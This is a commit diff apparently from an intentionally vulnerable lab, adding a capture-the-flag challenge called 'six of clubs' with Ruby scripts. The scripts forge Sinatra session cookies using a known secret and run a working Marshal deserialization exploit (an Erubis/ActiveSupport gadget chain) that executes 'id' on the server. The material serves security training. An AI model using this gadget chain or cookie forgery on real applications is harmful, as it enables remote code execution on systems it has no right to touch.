Add 6 of Clubs
This commit is contained in:
parent
129119ac97
commit
5ba1a36fd3
1
resources/flags/linux_flags/6_of_clubs/base64_string.txt
Normal file
1
resources/flags/linux_flags/6_of_clubs/base64_string.txt
Normal file
File diff suppressed because one or more lines are too long
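--- a/resources/flags/linux_flags/6_of_clubs/check_sinatra_vuln.rb
+++ b/resources/flags/linux_flags/6_of_clubs/check_sinatra_vuln.rb
@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+#
+# This will check our vulnerable app to see if it's vulnerable or not.
+# It does so by predicting the hash in the cookie.
+#
+
+require 'openssl'
+require 'cgi'
+require 'net/http'
+require 'base64'
+
+SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
+
+cli = Net::HTTP.new('172.28.128.3', 8181)
+req = Net::HTTP::Get.new('/')
+res = cli.request(req)
+cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || ''
+data, hash = cookie.split('--')
+obj = Marshal.load(Base64.decode64(CGI.unescape(data)))
+puts "[*] Found data: #{obj}"
+puts "[*] Found hash: #{hash}"
+puts "[*] Attempting to recreate the same hash with secret: #{SECRET}"
+expected_hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, CGI.unescape(data))
+puts "[*] Predicted hash: #{expected_hash}"
+
+if expected_hash == hash
+puts "[*] Yay! we can predict the hash. The server is vulnerable."
+end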
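--- a/resources/flags/linux_flags/6_of_clubs/get_flag.rb
+++ b/resources/flags/linux_flags/6_of_clubs/get_flag.rb
@@ -0,0 +1,48 @@
+#!/usr/bin/env ruby
+
+#
+# This PoC will inject Ruby code in our vulnerable app.
+# It will run the system command "id", and save the output in /tmp/your_id.txt
+#
+
+require 'openssl'
+require 'cgi'
+require 'net/http'
+require 'base64'
+require 'digest'
+
+SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
+
+http = Net::HTTP.new('172.28.128.3', 8181)
+req = Net::HTTP::Get.new('/')
+res = http.request(req)
+cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || ''
+data, hash = cookie.split('--')
+obj = Marshal.load(Base64.decode64(CGI.unescape(data)))
+sid = obj['session_id']
+puts "[*] Obtained session ID: #{sid}"
+
+puts "[*] Using stolen SECRET: #{SECRET}"
+puts "[*] Modifying _metasploitable cookie to 'six of clubs'"
+data = { 'session_id' => sid, '_metasploitable' => "six of clubs" }
+dump = [ Marshal.dump(data) ].pack('m')
+hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
+cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}"
+
+req = Net::HTTP::Get.new('/flag')
+req['Cookie'] = cookie
+res = http.request(req)
+
+File.open('6_of_clubs.png', 'wb') { |f| f.write(res.body) }
+md5 = Digest::MD5.hexdigest(res.body)
+puts "[*] 6_of_clubs.png downloaded."
+puts "[*] 6 of Clubs MD5: #{md5}"
+
+=begin
+$ ruby get_flag.rb
+[*] Obtained session ID: e3d1958384f27cc5f16424f060c480ff28048ebd4bff3f338d00f045ff308752
+[*] Using stolen SECRET: a7aebc287bba0ee4e64f947415a94e5f
+[*] Modifying _metasploitable cookie to 'six of clubs'
+[*] 6_of_clubs.png downloaded.
+[*] 6 of Clubs MD5: d9247a49d132a4f92dcc813f63eb1c8b
+=end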
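--- a/resources/flags/linux_flags/6_of_clubs/poc.rb
+++ b/resources/flags/linux_flags/6_of_clubs/poc.rb
@@ -0,0 +1,34 @@
+#!/usr/bin/env ruby
+
+#
+# This PoC will inject Ruby code in our vulnerable app.
+# It will run the system command "id", and save the output in /tmp/your_id.txt
+#
+
+require 'openssl'
+require 'cgi'
+require 'net/http'
+
+SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
+
+module Erubis;class Eruby;end;end
+module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
+
+erubis = Erubis::Eruby.allocate
+erubis.instance_variable_set :@src, "%x(id > /tmp/your_id.txt); 1"
+proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
+proxy.instance_variable_set :@instance, erubis
+proxy.instance_variable_set :@method, :result
+proxy.instance_variable_set :@var, "@result"
+
+session = { 'session_id' => '', 'exploit' => proxy }
+
+dump = [ Marshal.dump(session) ].pack('m')
+hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
+cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}"
+
+http = Net::HTTP.new('127.0.0.1', 8181)
+req = Net::HTTP::Get.new('/')
+req['Cookie'] = cookie
+res = http.request(req)
+puts "Done"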
BIN
resources/flags/linux_flags/6_of_clubs/source.png
Normal file
BIN
resources/flags/linux_flags/6_of_clubs/source.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 419 KiB |